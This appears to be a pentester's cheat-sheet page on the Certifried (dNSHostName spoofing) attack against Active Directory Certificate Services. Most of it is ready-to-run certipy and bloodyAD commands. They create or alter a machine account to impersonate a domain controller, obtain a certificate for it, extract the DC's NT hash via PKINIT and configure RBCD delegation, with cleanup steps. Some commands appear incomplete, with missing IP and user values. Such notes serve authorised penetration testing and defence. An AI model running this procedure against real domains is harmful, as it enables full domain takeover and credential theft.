dNSHostName Spoofing (Certifried)



If there's an object SID printed when requesting a certificate based on the User or Machine templates, the AD environment is not vulnerable:

$ certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -target CA01.megacorp.local -ca CorpCA -template User -dc-ip
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 120
[*] Got certificate with UPN 'snovvcrash@megacorp.local'
[*] Certificate object SID is 'S-1-5-21-1230029644-1443616230-1161330039-2139'  <== NOT vulnerable
[*] Saved certificate and private key to 'snovvcrash.pfx'


Create a new machine account with dNSHostName containing FQDN of a DC:

$ certipy account create -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user FAKEMACHINE -dns DC01.megacorp.local

Or change dNSHostName property manually for an already pwned machine account, e.g. via pre2k (will definitely break stuff!):

$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -spns ''
$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -dns DC01.megacorp.local

Request a certificate on behalf of that machine account with spoofed dNSHostName:

$ certipy req -u 'FAKEMACHINE$@megacorp.local' -p 'M4chinePassw0rd!' -target CA01.megacorp.local -ca CorpCA -template Machine -dc-ip


Authenticate with the obtained certificate and get DC's NT hash via PKINIT:

$ certipy auth -pfx dc01.pfx -dc-ip

Abuse RBCD

Authenticate with obtained certificate and configure RBCD on a DC via bloodyAD to allow delegation to the fake machine account:

$ openssl pkcs12 -in dc01.pfx -out dc01.pem -nodes
$ python bloodyAD.py -d megacorp.local -c ":dc01.pem" --host setRbcd 'FAKEMACHINE$' 'DC01$'

Clean Up

If dNSHostName was modified for an existing machine account, roll back the changes:

$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -dns PWNEDMACHINE.megacorp.local
$ certipy account update -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -user PWNEDMACHINE -spns WSMAN/pwnedmachine.MEGACORP.LOCAL,WSMAN/pwnedmachine,TERMSRV/pwnedmachine.MEGACORP.LOCAL,TERMSRV/pwnedmachine,RestrictedKrbHost/pwnedmachine,HOST/pwnedmachine,RestrictedKrbHost/pwnedmachine.MEGACORP.LOCAL,HOST/pwnedmachine.MEGACORP.LOCAL

A list of SPNs to backup can be taken from a BH dump:

$ cat 20230301144823_computers.json | jq -r '.data[].Properties | select(.name == "PWNEDMACHINE.MEGACORP.LOCAL") | .serviceprincipalnames'

About the Fix

Last updated